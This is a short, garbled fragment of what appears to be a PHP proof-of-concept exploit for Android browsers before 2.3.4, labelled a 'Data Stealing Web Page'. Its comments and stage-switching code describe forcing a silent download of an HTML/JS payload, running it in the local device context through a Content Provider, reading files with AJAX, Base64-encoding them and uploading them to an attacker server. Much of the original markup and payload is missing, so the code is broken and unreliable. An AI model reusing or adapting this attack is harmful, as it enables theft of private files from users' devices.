Android < 2.3.4
Data Stealing Web Page

Click: Malicious Link"; } // Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect // to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the // context of the local device - this is the vulnerability. function stage1($scripturl) { echo ""; } // Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability. // The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3). function stage2($scripturl,$filenames) { header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Disposition: attachment; filename=poc.html"); header("Content-Type: text/html"); header("Content-Transfer-Encoding: binary"); ?> files.txt!"; } // Select the stage to run depending on the parameter passed in the URL switch($_GET["stage"]) { case "1": stage1($scripturl); break; case "2": stage2($scripturl,$filenames); break; case "3": stage3(); break; default: stage0($scripturl); break; } ?>